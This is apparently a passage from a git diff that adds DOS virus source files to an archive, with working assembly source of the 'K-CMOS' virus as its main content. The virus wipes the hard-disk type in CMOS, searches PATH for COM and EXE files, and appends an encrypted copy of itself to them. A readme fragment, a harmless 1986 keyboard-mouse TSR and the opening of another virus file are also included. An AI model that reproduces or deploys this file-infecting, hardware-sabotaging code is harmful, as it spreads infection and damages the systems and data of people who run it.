Settings" or its + equivalent. Write down the values for the HD types on drives + C and D. + + 3- IF the hard drive types are "47" the you MUST record all + of the data in the displayed fields, i.e, the information + such as the number of heads, sectors, etc. Again, you MUST + do this BEFORE you run K-CMOS or you will have to look in + your manuals somewhere to get the specific HD information! + + NOTE: Newer AMI BIOSes have an auto-detect feature in the + Setup menu, so you might not have to worry about hard disk type + number, number of sectors, number of heads, etc., if you have + the feature in your computer's BIOS. The setup will do the + work for you. + + 4 - Now that you've recorded this data, you can test K-CMOS + and watch it unhook your system. On reboot, you will lose the + hard disk. Reboot, bring up your Setup program as above, re- + enter the values for the hard disk which you previously + recorded, exit and save. You are back in business. + + Enjoy! + +$ + +;=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- +; K-CM”S.ASM +; AUTHOR: K”hntark +; DATE: November 93 +; Size: < 1100 bytes +; +;=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- + +MAIN SEGMENT BYTE + ASSUME cs:main,ds:main,ss:nothing ;all part in one segment=com file + ORG 100h + +;********************************** +; fake host program +;********************************** + +HOST: + db 0E9h,0Ah,00 ;jmp NEAR PTR VIRUS + db ' ' + db 90h,90h,90h + mov ah,4CH + mov al,0 + int 21H ;terminate normally with dos + +;ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ + +;********************************** +; VIRUS CODE STARTS HERE +;********************************** + +VIRUS: + + mov si,010Dh ;get starting address + +;************************************ +; Fix DS ES +;************************************ + + mov al,cs:BYTE PTR [si + COM_FLAG - VIRUS] ;save COM/EXE flag in AX + mov WORD PTR cs:[si + PSP_SEG - VIRUS],es ;save PSP segment for use in PATH search + push ax ;save COM/EXE flag + push es ;save es and ds in case file is EXE + push ds + + push cs + push cs + pop es ;es = cs + pop ds ;ds = cs + + push WORD PTR [si + ORIG_IPCS - VIRUS] ;save IP + push WORD PTR [si + ORIG_IPCS - VIRUS + 2] ;save CS + + push WORD PTR [si + ORIG_SSSP - VIRUS] ;save SS + push WORD PTR [si + ORIG_SSSP - VIRUS + 2] ;save SP + + push WORD PTR [si + START_CODE - VIRUS] + push WORD PTR [si + START_CODE - VIRUS + 2] + +;************************************ +; redirect DTA onto virus code +;************************************ + + lea dx,[si + DTA - VIRUS] ;put DTA at the end of the virus for now + mov ah,1ah ;set new DTA function to ds:dx + int 21h + +;************************************ +; KIll fixed disk drives in CMOS +;************************************ + + mov dx,0012h ;hard drive type register + xor bx,bx ;New hard drive type = 0 (No Fixed drive) + call CMOS_CHCKSM + +;************************************ +; MAIN Routines called from here +;************************************ + + lea bp,[si + COM_MASK - VIRUS] + call FIND_FILE ;get a com file to attack! + lea bp,[si + EXE_MASK - VIRUS] + call FIND_FILE ;get an exe file to attack! + +;ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ + +EXIT_VIRUS: + +;************************************ +; set old DTA address +;************************************ + + mov ah,1ah + mov dx,80h ;fix dta back to ds:dx + int 21h ;host program + + pop WORD PTR [si + START_CODE - VIRUS + 2] + pop WORD PTR [si + START_CODE - VIRUS] + + cli + pop WORD PTR [si + ORIG_SSSP - VIRUS + 2] ;save SP + pop WORD PTR [si + ORIG_SSSP - VIRUS] ;save SS + sti + + pop WORD PTR [si + ORIG_IPCS - VIRUS + 2] ;save CS + pop WORD PTR [si + ORIG_IPCS - VIRUS] ;save IP + + pop ds ;restore ds + pop es ;restore es + pop ax ;restore COM_FLAG + + cmp al,00 ;com infection? + je RESTORE_COM + +;************************************ +; restore EXE.. and exit.. +;************************************ + + mov bx,ds ;ds has to be original one + add bx,low 10h + mov cx,bx + add bx,cs:WORD PTR [si + ORIG_SSSP - VIRUS] ;restore ss + cli + mov ss,bx + mov sp,cs:WORD PTR [si + ORIG_SSSP - VIRUS + 2] ;restore sp + sti + add cx,cs:WORD PTR [si + ORIG_IPCS - VIRUS+ 2] + push cx ;push cs + push cs:WORD PTR [si + ORIG_IPCS - VIRUS] ;push ip + db 0CBh ;retf + +;************************************ +; restore 4 original bytes to file +;************************************ + +RESTORE_COM: + push si ;save si + cld ;clear direction flag + add si,OFFSET START_CODE - OFFSET VIRUS ;source: ds:si + mov di,0100h ;destination: es:di + movsw ;shorter & faster than + movsw ;mov cx,04 and rep movsb + pop si ;restore si + +;**************************************************************** +; zero out registers for return to +; host program +;**************************************************************** + + mov ax,0100h ;return address + xor bx,bx + xor cx,cx + xor si,si + xor di,di + push ax + xor ax,ax + cwd + ret + +;ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ + +NO_GOOD: stc + jmp GET_OUT + +QUICK_EXIT: stc ;set carry flag + ret + +;----------------------------------------------------------------------------- + +CHECK_N_INFECT_FILE: + +;****************** +; 1-Check TIME ID +;****************** + + mov cx,WORD PTR [si + DTA_File_TIME - VIRUS] ;file time from DTA + and cl,1Dh ;58 seconds? + cmp cl,1Dh + je QUICK_EXIT + +;********************************************* +; 2-Clear attributes +;********************************************* + + lea dx,[si + WORK_AREA - VIRUS] ;dx=ptr to path + current filename + xor cx,cx ;set attributes to normal + mov ax,4301h ;set file attributes to cx + int 21h ;int 21h + jc QUICK_EXIT ;error.. quit + +;***************** +; 3-OPEN FILE +;***************** + + mov ax,3D02h ;r/w access to it + int 21h + jc NO_GOOD ;error.. quit + xchg ax,bx ;bx = file handle + +;******************** +; 4-Read 1st 28 bytes +;******************** + + mov cx,28d ;read first 5 bytes of file + lea dx,[si + START_CODE - VIRUS] ;store'em here + mov ah,3Fh ;DOS read function + int 21h + jc NO_GOOD ;error? get next file + +;********************* +; 5-CHECK FILE +;********************* + + cmp WORD PTR [si + START_CODE - VIRUS],'ZM' ;EXE file? + je CHECK_EXE ;no? check com + + cmp WORD PTR [si + START_CODE - VIRUS],'MZ' ;EXE file? + je CHECK_EXE ;no? check com + +CHECK_COM: + mov ax,WORD PTR [si + DTA_File_SIZE - VIRUS] ;get file's size + push ax ;insert new entry point just in case.. + add ax,100h + DECRYPTOR_SIZE + mov WORD PTR [si + 1],ax + pop ax + + add ax,OFFSET FINAL - OFFSET VIRUS ;add virus size to it + jc NO_GOOD ;bigger then 64K:nogood + + cmp BYTE PTR [si + START_CODE - VIRUS],0E9H ;compare 1st byte to near jmp + jne short INFECT_COM ;not a near jmp, file ok + + cmp BYTE PTR [si + START_CODE+3 - VIRUS],20h ;check for ' ' + je NO_GOOD ;file ok .. infect + jmp short INFECT_COM + + +CHECK_EXE: + cmp WORD PTR [si + START_CODE - VIRUS + 18h],40h ;Windows file? + je NO_GOOD ;no? check com + + cmp WORD PTR [si + START_CODE - VIRUS + 01Ah],0 ;internal overlay + jne NO_GOOD ;yes? exit.. + + cmp WORD PTR [si + START_CODE - VIRUS + 12h],ID ;already infected? + je NO_GOOD + +INFECT_EXE: + mov BYTE PTR [si+ COM_FLAG - VIRUS],01 ;exe infection + jmp short SKIP + +INFECT_COM: + mov BYTE PTR [si+ COM_FLAG - VIRUS],00 ;com infection + +SKIP: + +;********************* +; 6-set PTR @EOF +;********************* + + xor cx,cx ;prepare to write virus on file + xor dx,dx ;position file pointer,cx:dx = 0 + ;cwd ;position file pointer,cx:dx = 0 + mov ax,4202H + int 21h ;locate pointer at end EOF DOS function + +;********************* +; 7-Fix deCRYPTtor +;********************* + + push ax ;save file size (COM file, for EXE files + ;this is redone later) + add ax,100h + DECRYPTOR_SIZE + mov WORD PTR [si + WORK_BUFFER - VIRUS + 4],ax ;insert address + mov ax,(OFFSET FINAL - OFFSET VIRUS)/2 ;virus size in Words + mov WORD PTR [si + WORK_BUFFER - VIRUS + 1],ax ;insert size + + in al,40h ;get a random word in AX + xchg ah,al + in al,40h + xor ax,0813Ch + add ax,09249h + rol al,1 + ror ah,1 + + mov WORD PTR [si + WORK_BUFFER - VIRUS + 9],ax ;insert random KEY + pop ax ;restore file size + + + cmp BYTE PTR [si+ COM_FLAG - VIRUS],01 ;exe file? + jne DO_COM + +;************************* +; 8-FIX AND WRITE EXE HDR +;************************* + + push bx ;save file handler + +;----------------------- +; save CS:IP & SS:SP +;----------------------- + + push si + cld ;clear direction flag + lea di,[si + ORIG_SSSP - VIRUS] ;save original CS:IP at es:di + lea si,[si + START_CODE - VIRUS + 14d] ;from ds:si + movsw ;save ss + movsw ;save sp + + add si,02 ;save original SS:SP + movsw ;save ip + movsw ;save cs + pop si + +;----------------------------- +; calculate new CS:IP +;----------------------------- + + mov bx,WORD PTR[si + START_CODE - VIRUS + 8] ;header size in paragraphs + mov cl,04 ;multiply by 16, won't work with headers > 4096 + shl bx,cl ;bx=header size + + push ax ;save file size at dx:ax + push dx + + sub ax,bx ;file size - header size + sbb dx,0000h ;fix dx if carry, assures dx, ip < 16 + + call CALCULATE + + mov WORD PTR [si+ START_CODE - VIRUS + 12h],ID ;put ID in checksum slot + mov WORD PTR [si+ START_CODE - VIRUS + 14h],ax ;IP + add ax,DECRYPTOR_SIZE + mov WORD PTR [si+1],ax ;insert new starting address + mov WORD PTR [si + WORK_BUFFER - VIRUS + 4],ax ;insert address on decryptor + mov WORD PTR [si+ START_CODE - VIRUS + 16h],dx ;CS + +;----------------------------- +; calculate & fix new SS:SP +;----------------------------- + + pop dx + pop ax ;filelength in dx:ax + + add ax,OFFSET FINAL - OFFSET VIRUS ;add filesize to ax + adc dx,0000h ;fix dx if carry + + push ax + push dx + add ax,40h ;if filesize + virus size is even then the stack size + test al,01 ;even or odd stack? + jz EVENN + inc ax ;make stack even +EVENN: + call CALCULATE + + mov WORD PTR [si+ START_CODE - VIRUS + 10h],ax ;SP + mov WORD PTR [si+ START_CODE - VIRUS + 0Eh],dx ;SS + +;----------------------------- +; Calculate new file size +;----------------------------- + + pop dx + pop ax + + push ax + mov cl,0009h ;2^9 = 512 + ror dx,cl ;/ 512 (sort of) + shr ax,cl ;/ 512 + stc ;set carry flag + adc dx,ax ;fix dx , page count + pop cx + and ch,0001h ;mod 512 + + mov WORD PTR [si+ START_CODE - VIRUS + 4],dx ;page count + mov WORD PTR [si+ START_CODE - VIRUS + 2],cx ;save remainder + + pop bx ;restore file handle + +DO_COM: + +;********************* +; 9-write deCRYPTor +;********************* + + lea dx,[si + WORK_BUFFER - VIRUS] ;write from here + mov cx,DECRYPTOR_SIZE ;write # of bytes + mov ah,40h ;write to file bx=file handle + int 21h ;write from DS:DX + +;********************* +; 10-enCRYPT virus +;********************* + + push ds ;save DS + push es ;save ES + mov ax,0A00h ;set up new ES (work) segment + push ax + pop es ;ES=AX=0A00h + xor di,di ;DI=0 + mov cx,(OFFSET FINAL - OFFSET VIRUS)/2 ;virus size cx= # words + push si ;save SI + mov dx,WORD PTR [si + WORK_BUFFER - VIRUS + 9] ;get Random KEY in DX + +enCRYPT: + lodsw ;word ptr ds:[si] => ax + sub ax,dx ;encrypt ax + stosw ;ax => word ptr es:[di] + loop enCRYPT + + pop si ;restore SI + xor dx,dx ;DX=0 + push es + pop ds ;DS=ES + +;********************* +; 11-Write Virus +;********************* + + mov cx,OFFSET FINAL - OFFSET VIRUS ;write virus cx= # bytes + mov ah,40h ;write to file bx=file handle + int 21h ;write from DS:DX + + pop es ;restore ES + pop ds ;restore DS + +;********************* +; 12-set PTR @BOF +;********************* + + mov ax,4200h ;locate pointer at beginning of + xor cx,cx + xor dx,dx ;position file pointer,cx:dx = 0 + ;cwd ;position file pointer,cx:dx = 0 + int 21h ;host file + + cmp BYTE PTR [si+ COM_FLAG - VIRUS],01 ;exe file? + jne DO_COM2 + +;********************* +; 13-Write EXE Header +;********************* + + mov cx,28d ;#of bytes to write + lea dx,[si + START_CODE - VIRUS] ;ds:dx=pointer of data to write + jmp short CONT + +;**************************************************** +; 14-write new 4 bytes to beginning of file (COM) +;*************************************************** + +DO_COM2: + mov ax,WORD PTR [si + DTA_File_SIZE - VIRUS] + sub ax,3 + mov WORD PTR [si + START_IMAGE + 1 - VIRUS],ax + + mov cx,4 ;#of bytes to write + lea dx,[si + START_IMAGE - VIRUS] ;ds:dx=pointer of data to write + +CONT: + mov ah,40h ;DOS write function + int 21h ;write 5 / 28 bytes + +;************************************************* +; 15-Restore date and time of file to be infected +;************************************************* + + mov ax,5701h + mov dx,WORD PTR [si + DTA_File_DATE - VIRUS] + mov cx,WORD PTR [si + DTA_File_TIME - VIRUS] + and cx,0FFE0h ;mask all but seconds + or cl,1Dh ;seconds to 58 + int 21h + +GET_OUT: +;**************** +; 16-Close File +;**************** + + pushf ;save flags to return on exit + mov ah,3Eh + int 21h ;close file + +;************************************************* +; 17-Restore file's attributes +;************************************************* + + mov ax,4301h ;set file attributes to cx + lea dx,[si + WORK_AREA - VIRUS] ;dx=ptr to path + current filename + xor cx,cx + mov cl,BYTE PTR [si + DTA_File_ATTR - VIRUS] ;get old attributes + int 21h + popf ;restore flags to return on exit + ret ;infection done! + +;ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ + +CALCULATE: + mov cl,0Ch + shl dx,cl ;dx * 4096 + mov bx,ax + mov cl,4 + shr bx,cl ;ax / 16 + add dx,bx ;dx = dx * 4096 + ax / 16 =SS CS + and ax,0Fh ;ax = ax and 0Fh =SP IP + ret + +;ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ + +FIND_FILE: + push si + push es + mov es,es:WORD PTR [si + PSP_SEG - VIRUS] ;es=saved PSP segment + mov es,es:2ch ;es:di points to environment + xor di,di + mov bx,si +FIND_PATH: + lea si,[bx + PATH_STR - VIRUS] ;source :ds:si = 'P' + lodsb ;load 'P' + mov cx,7FFFh ;size of environment= 32768 bytes + not cx ;cx=8000h + repne scasb ;find 'P' in es:di + mov cx,4 + +CHECK_NEXT_4: + lodsb ;check for 'ATH' + scasb + jne FIND_PATH + loop CHECK_NEXT_4 + + mov WORD PTR [bx + PATH_ADDRESS - VIRUS],di ;save path's address es:di + lea di,[bx + WORK_AREA - VIRUS] + pop es ;restore PSP segment + jmp short COPY_FILE_SPEC_TO_WORK_AREA + +NO_FILE_FOUND: + cmp word ptr [bx + PATH_ADDRESS - VIRUS],0 ;has path string ended? + jne FOLLOW_THE_PATH ;if not there are more subdirs + jmp EXIT ;path string ended.. exit + +FOLLOW_THE_PATH: + lea di,[bx + WORK_AREA - VIRUS] ;destination es:di = work area + mov si,WORD PTR [bx + PATH_ADDRESS - VIRUS] ;source ds:si = Environment + mov ds,WORD PTR [bx + PSP_SEG - VIRUS] ;ds=PSP segment + mov ds,ds:2ch ;ds:si points to environment + +UP_TO_LODSB: + lodsb ;get character + xchg cx,ax ;he he + cmp cl,';' ;is it a ';'? + xchg cx,ax ;he he + je SEARCH_AGAIN + cmp al,0 ;end of path string? + je CLEAR_SI + stosb ;save path marker into di + jmp SHORT UP_TO_LODSB + +CLEAR_SI: ;mark the fact that we are looking thru the final subdir + xor si,si + +SEARCH_AGAIN: + mov WORD PTR cs:[bx + PATH_ADDRESS - VIRUS],si ;save address of next subdir + cmp BYTE PTR cs:[di-1],'\' ;ends with a '\'? + je COPY_FILE_SPEC_TO_WORK_AREA + mov al,'\' ;add '\' if not + stosb + +;*********************************************** +; put *.COM / *.EXE into workspace +;*********************************************** + +COPY_FILE_SPEC_TO_WORK_AREA: + push cs + pop ds ;ds=cs + mov WORD PTR [bx + FILENAME_PTR - VIRUS],di ;es:di = WORK_AREA + mov si,bp ;bp=file spec + mov cx,3 ;length of *.com0/ *.EXE0 + rep movsw ;move *.COM0/ *.EXE0 to workspace + +;************************************************ +; Find FIRST FILE +;************************************************ + + mov ah,04EH ;DOS function + lea dx,[bx + WORK_AREA - VIRUS] ;dx points to path in workspace + mov cx,3Fh ;attributes RO or hidden OK +FIND_NEXT_FILE: int 21H + jnc FILE_FOUND + jmp short NO_FILE_FOUND + +FILE_FOUND: + mov di,WORD PTR [bx + FILENAME_PTR - VIRUS] ;destination: es:di + lea si,[bx + DTA_File_NAME - VIRUS] ;origin ds:si + +MOVE_ASCII_FILENAME: + lodsb ;move filename to the end of path + stosb + cmp al,0 ;end of ASCIIZ string? + jne MOVE_ASCII_FILENAME ;keep on going + pop si ;restore si to use in the following + push bp ;save COM / EXE string pointer + call CHECK_N_INFECT_FILE ;check file if file found + pop bp ;restore COM / EXE string pointer + jnc EXITX + mov bx,si ;fix bx + push si ;save si again + mov ah,04Fh + jmp short FIND_NEXT_FILE + +EXIT: + pop si +EXITX: + ret + +;============================================================================== +CMOS_CHCKSM: + +; INPUT: +; DL = CMOS ADDRESS of BYTE TO be MODiFiED +; BL = NEW BYTE VALUE to be PUT IN CMOS RAM + +; OUTPUT: +; None. +; REGISTERS USED: AX,CX,BX,DX + +;************************* +; GET CMOS Checksum => CX +;************************* + + xor ax,ax + mov al,2Eh ;msb of checksum address + out 70h,al ;send address / control byte + in al,71h ;read byte + + xchg ch,al ;store al in ch + + mov al,2Fh ;lsb of checksum address + out 70h,al ;send address / control byte + in al,71h ;read byte + + xchg cl,al ;store lsb to cl + +;********************* +; Fix CMOS Checksum +;********************* + + push dx + xchg dl,al ;AL = address + out 70h,al ;send address / control byte + in al,71h ;read register + + sub cx,ax ;subtract from checksum + + add cx,bx ;update checksum value in register. + +;**************************** +; Write CMOS byte to Address +;**************************** + + pop dx + xchg dl,al ;AL = address + out 70h,al ;specify CMOS address + xchg al,bl ;new CMOS value => al + + out 71h,al ;write new CMOS byte + +;********************* +; Write CMOS Checksum +;********************* + + mov al,2Eh ;address of checksum 's msb + out 70h,al ;specify CMOS address + xchg al,ch ;msb of new checksum + + out 71h,al ;write new CMOS msb + + mov al,2Fh ;address of checksum 's lsb + out 70h,al ;specify CMOS address + xchg al,cl ;lsb of new checksum + + out 71h,al ;write new CMOS lsb + ret + +;ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ + +NAME_AUTHOR db 'K-CM”S / K”hntark' + +WORK_BUFFER db 0B9h,00,00 ;mov cx,VSIZE + db 0BBh,00,00 ;mov si,VADDRESS + db 02Eh,081h,07,00,00 ;add WORD PTR cs:[si],KEY + db 083h,0C3h,02 ;add si,02 + ;db 043h,043h ;inc bx, inc bx + db 0E2h,0F6h ;loop add.. + +COM_MASK db '*.COM',0 +EXE_MASK db '*.EXE',0 +PATH_STR db 'PATH=',0 + +START_IMAGE db 0E9h,0,0,020h + +ORIG_SSSP dw 0,0 +ORIG_IPCS dw 0,0 +COM_FLAG db 0 ;0=COM 1=EXE +START_CODE db 4 dup (90h) ;4 bytes of COM or EXE hdr goes here + +;ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ + +FINAL: ;label of byte of code to be kept in virus when it moves + +;ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ + +HEAP: + +START_CODE2 db 24d dup (0) ;2nd part of EXE hdr + +PSP_SEG dw 0 + +PATH_ADDRESS dw 0 +FILENAME_PTR dw 0 +WORK_AREA db 64 DUP (0),'$' + +DTA db 21 dup(0) ;reserved +DTA_File_Attr db ? +DTA_File_Time dw ? +DTA_File_Date dw ? +DTA_File_Size dd ? +DTA_File_Name db 13 dup(0) + +;ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ + +ID equ 77h +DECRYPTOR_SIZE equ 16d ; equ OFFSET WORK_BUFFER - OFFSET START_IMAGE + +MAIN ENDS + END HOST diff --git a/MSDOS/Virus.MSDOS.Unknown.kak.txt b/MSDOS/Virus.MSDOS.Unknown.kak.txt new file mode 100644 index 00000000..16c056b6 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.kak.txt @@ -0,0 +1,71 @@ +
+
+ + \ No newline at end of file diff --git a/MSDOS/Virus.MSDOS.Unknown.kbm.asm b/MSDOS/Virus.MSDOS.Unknown.kbm.asm new file mode 100644 index 00000000..43f3ac45 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.kbm.asm @@ -0,0 +1,253 @@ +;--------------------------------------------------------------------------- +;KBM KeyBoard Mouse by Dan Rollins 5-20-85 +; +; This program intercepts keyboard data and creates a bit pattern determined +; according to whether or not certain keys are currently being pressed. +; +; The bit pattern is stored in the "inter-application communication area" +; at 0000:04f0. It is interpreted as: +; +; 7 6 5 4 3 2 1 0 (bit number) +; C m P H l d r u (bit name) +; | | | | | | | | +; | | | | | | | +- bit 0 (01h) - set = 1 while [up arrow] is pressed +; | | | | | | +--- bit 1 (02h) - set = 1 while [right arrow] is pressed +; | | | | | +----- bit 2 (04h) - set = 1 while [down arrow] or [5] is pressed +; | | | | +------- bit 3 (08h) - set = 1 while [left arrow] is pressed +; | | | | +; | | | +--------- bit 4 (10h) - set = 1 while [Home] is pressed +; | | +----------- bit 5 (20h) - set = 1 while [PgUp] is pressed +; | +------------- bit 6 (40h) - set = 1 while grey [-] is pressed +; +--------------- bit 7 (80h) - set = 1 while [CapsLock] is pressed +; +; As soon as the key is released, the relevant bit is reset to 0. +; +; The byte at 0000:04f1 is the "pass-through/filter" mode flag. When this +; byte is zero, all keystrokes are passed to the normal keyboard handler. +; When it's non-zero, the selected keystrokes are filtered (disabled for +; normal input). BIOS and DOS keyboard calls will not recognize them. +; +; The Alt-NumLock keystroke toggles between pass-through and filter modes. +; +; This program is installed and remains resident. It is a COM-format +; file, so it must be converted with EXE2BIN. +; +; Copyright (c) Ziff-Davis Publishing Co., 1986. All rights reserved. +; +;= equates =============== + +KB_DATA_PORT equ 60h ;These are listed in the PC and XT +KB_CTRL_PORT equ 61h ; Technical Reference Manuals + +KB_FLAG equ 417h ; the BIOS shift-key status (in segment 0) +ALT_STATE equ 8 ; Bit pattern while the [Alt] key is pressed +NUMLOCK_KEY equ 69 ; scan-code of the [NumLock] key + +INT_CTL_PORT equ 20h ; Interrupt controller port (8259 chip) +EOI equ 20h ; End-Of-Interrupt code sent to 8259 + +RELEASE_BIT equ 80h ;also called the "break" bit: a key was released + +KEY_BITS equ 04f0H ;the address of the key bit flags (segment 0) +MODE_FLAG equ 04f1H ;when 0, all keys are passed to normal kbint +INST_FLAG equ 04f2H ; set to 1234H during installation + +com_seg segment + assume cs:com_seg, ds:com_seg + org 100h ;must have for COM-format program +kbm proc far + jmp set_up ;get past data and install interrupt hander + +;============= program data area ======== + +norm_kbd_int label dword ;type DWORD so it can be used in a FAR jump +nki_offset dw 0 ; This address is stored in the SET_UP proc +nki_segment dw 0 ; It's the address of the previous kbint routine + +;----------------------------------------------------------------------------- +; KBD_INT +; 1) read the keyboard +; 2) set/reset bits in mouse movement byte +; 3) execute normal keyboard interrupt +; +; scan bit key suggested meaning +; code flag name (defined by user) +; ---- ---- --------- ---------------------- +kbm_tbl db 72, 1 ; num.pad 8 go up + db 77, 2 ; num.pad 6 go right + db 80, 4 ; num.pad 2 go down + db 75, 8 ; num.pad 4 go left + + db 76, 4 ; num.pad 5 go down + db 71, 16 ; Home button 1 + db 73, 32 ; PgUp button 2 + db 74, 64 ; grey minus button 3 + db 58, 128; CapsLock "high-gear shift" for fast motion +tbl_end label byte + +;----------------------------------------------------------------------------- +; KBD_INT +; This procedure intercepts the ROM-BIOS KB_INT. +; It sets and resets bits of a kbd flag as the user presses and releases keys. +; When the byte at 0000:04F1 is 0, the keystroke is passed on to the +; original keyboard handler. + +kbd_int proc far + sti + cld + push ax + push si + push ds + + in al,KB_DATA_PORT ;read scan-code from keyboard into AL + mov ah,al ;save original byte in AH + and al,7fh ;mask off "release bit" for comparisons + + mov si,offset kbm_tbl +k_20: + cmp si,offset tbl_end ;at end of table? + ja k_25 ; yes, key not found. Exit to normal kbint + cmp al,byte ptr cs:[si] ; is this the key? + je k_30 ; yes, process the keystroke + inc si ; no, point past the scan code + inc si ; point past the bit-mask + jmp k_20 ; and loop back for the next entry + +k_25: +;------- check for mode-toggle by user + cmp ah,NUMLOCK_KEY ;is this a press of [NumLock]? + jne k_27 ; no, go + sub si,si ; yes, look to BIOS data area + mov ds,si + test byte ptr ds:[KB_FLAG],ALT_STATE ; is [Alt] pressed? + jz k_27 ; no, pass the key on + + xor byte ptr ds:[MODE_FLAG],1 ; yes, toggle the mode and + jmp short k_exit ; exit w/o processing + +;------- the keystroke is to be processed by the normal keyboard interrupt +k_27: + pop ds + pop si + pop ax + jmp cs:[norm_kbd_int] ;continue at normal keyboard handler + +k_30: +;------- process the scan code into a bit-pattern + mov al,cs:[si+1] ;get bit-flag mask + + sub si,si + mov ds,si ;point to segment of KEY_BITS + + test ah,RELEASE_BIT ;is this key being released? + jz k_40 ; no, go + +;------- process key release + not al ;flip-flop mask bits + and byte ptr ds:[KEY_BITS],al ;mask off released key bit + jmp k_50 +k_40: +;------- process key press + or byte ptr ds:[KEY_BITS],al ;set the bit for pressed key + +;------- determine whether key should be passed on to normal keyboard handler +k_50: + cmp byte ptr ds:[MODE_FLAG],0 ;should key be processed further? + je k_27 ; yes, continue at normal kb int + +;------- the keystroke is to be ignored by the rest of the system. +;------- wrap up this keyboard interrupt. + +k_exit: + in al,KB_CTRL_PORT ;get current value of keyboard control lines + mov ah,al ; save it + or al,80h ;set the "enable kbd" bit + out KB_CTRL_PORT,al ; and write it out the control port + xchg ah,al ;fetch the original control port value + out KB_CTRL_PORT,al ; and write it back + + pop ds + pop si + + cli + mov al,EOI ;send End-Of-Interrupt signal + out INT_CTL_PORT,al ; to the 8259 Interrupt Controller + pop ax + iret ;exit to interrupted program +kbd_int endp + +LAST_BYTE equ offset $+1 ;This is the address passed to INT 27H + ;Notice that the code of the SET_UP + ; procedure is not preserved in memory + +;----------------------------------------------------------------------------- +; SET_UP +; This routine is executed only once, when the program is installed. + +inst_msg db 'KBM KeyBoard Mouse driver',0dh,0ah + db 'Copyright (c) 1986 Ziff-Davis Publishing Co.,',0dh,0ah,'$' + +err_msg1 db 07,'Already installed',0dh,0ah,'$' +err_msg2 db 'Wrong DOS version.',0dh,0ah,'$' + +set_up proc near + +;------- make sure this is DOS 2.0 or later + mov ah,30h + int 21h + cmp al,2 + jae su_10 + mov dx,offset err_msg2 + jmp msg_exit +su_10: + +;------- see if KBM has already been installed + mov ax,0 + mov es,ax + cmp es:[INST_FLAG],1234H ;already installed? + jne su_20 ; no, continue + mov dx,offset err_msg1 ; yes, exit with message + jmp msg_exit +su_20: + mov word ptr es:[INST_FLAG],1234h ; flag says KBM is installed + +;------- save the old kbint vector and set up the new one + mov al,9 + mov ah,35h ;DOS GET_VECTOR service + int 21h ; for interrupt 9 (KBINT) + + mov al,9 ;get address of the current kb int handler + mov ah,35h ;DOS GET_VECTOR service + int 21h + mov nki_segment,es ;save old address + mov nki_offset,bx + + mov dx,offset kbd_int ;set INT 9 to local keyboard interceptor + mov al,9 ;set vector for INT 9 to DS:DX + mov ah,25h ;DOS SET_VECTOR service + int 21h + + mov ax,0 + mov es,ax ;initialize variables: + mov byte ptr es:[MODE_FLAG],0 ; process all keystrokes + mov byte ptr es:[KEY_BITS],0 ; no keys are pressed + +;------- display message to indicate install`tion complete + mov dx,offset inst_msg + mov ah,9 + int 21h + +;------- exit to DOS, leaving the interrupt handler resident + mov dx,LAST_BYTE + int 27h + +msg_exit: + mov ah,9 + int 21h + int 20h +set_up endp +kbm endp +com_seg ends + end kbm + + \ No newline at end of file diff --git a/MSDOS/Virus.MSDOS.Unknown.keeper.asm b/MSDOS/Virus.MSDOS.Unknown.keeper.asm new file mode 100644 index 00000000..15155090 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.keeper.asm @@ -0,0 +1,483 @@ +VECTORS SEGMENT AT 0H ;Set up segment to intercept Interrupts + ORG 9H*4 ;The keyboard Interrupt +KEYBOARD_INT LABEL 